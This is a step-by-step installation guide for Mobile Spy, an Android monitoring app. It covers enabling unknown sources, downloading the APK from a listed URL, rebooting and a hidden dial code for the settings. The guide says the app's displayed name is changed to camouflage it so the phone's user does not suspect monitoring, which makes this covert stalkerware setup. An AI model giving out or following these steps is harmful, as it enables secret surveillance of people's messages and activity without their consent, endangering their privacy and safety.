After you have created your username and password, you should perform these steps below. You will NOT need to connect your phone to your computer to install.
1. First thing, you will need to install the correct built of Mobile Spy for your Android operating system. To check to see what version of the Android OS is installed on the phone, go to your Settings menu, then the About Phone tab, then scroll down to the Firmware Version field. This is the version of the operating system installed on the phone. You will need this information for Step #4 of this installation guide.
2. Next, you will want to enable your Android device to install non-Market applications. To do so, on your Home screen, tap Settings
. Then tap Applications
3. On this next screen, tap the checkbox next to Unknown Sources to allow the installation of non-Market applications. The check inside the box will fill with color once this is done.
PLEASE NOTE: If you DO NOT have an 'Unknown Sources' box, your service provider may have restricted third-party applications from being installed and run on their devices.
After this is done, return to your Home screen. Once you return to your Home screen, tap on the Browser icon to bring up your internet browser.
4. Now you will need to download the correct version of Mobile Spy that is designed for your version of the Android operating system. In the address bar, type in the appropriate URL address for the version of Mobile Spy you need from the list.
Mobile Spy Version 5.0 (LIVE Control Panel, Email Log Delivery & SMS Commands)
Android 2.0.0 through 2.3.7: http://asd-ms.com/ms5-a/ms5-2.1-above.apk
Once you have typed in the appropriate URL address of Mobile Spy for your particular Android OS version, tap Go.
5. After tapping Go, Mobile Spy will automatically download onto your Android device.
6. Once the download is complete, tap on the completed Smartphone entry to begin the installation.
7. On this next screen, Mobile Spy will ask to proceed with the installation. You will notice the name of the application shown does not say Mobile Spy. The name was changed to better camouflage it in the Application list on the device as not to arouse suspicion that the device is being monitored. Tap Install to begin.
8. Mobile Spy will now install. This next screen will appear showing the installation progress.
9. Once Mobile Spy is completely installed, this final screen will appear. Tap Done to exit the installation.
10. Once the installation is complete and you return to your Home screen, you MUST POWER DOWN the phone and wait 30 seconds. Then, POWER THE DEVICE BACK ON so that Mobile Spy will start up.
11. Now you MUST configure the monitoring features of Mobile Spy in order for the software to log and record the areas you want. The step-by-step instructions to do so are on the following page:
Mobile Spy for Android Setup and Configuration Instructions
To make changes to the user/password just dial the digits again: *12345#
You can also change the *12345# to anything you wish by pressing MENU > Configure > Change PIN command.
To uninstall Mobile Spy from your Android device, please follow these instructions:
Removing Mobile Spy from your Android device
See the general User Guide for more info on checking logs.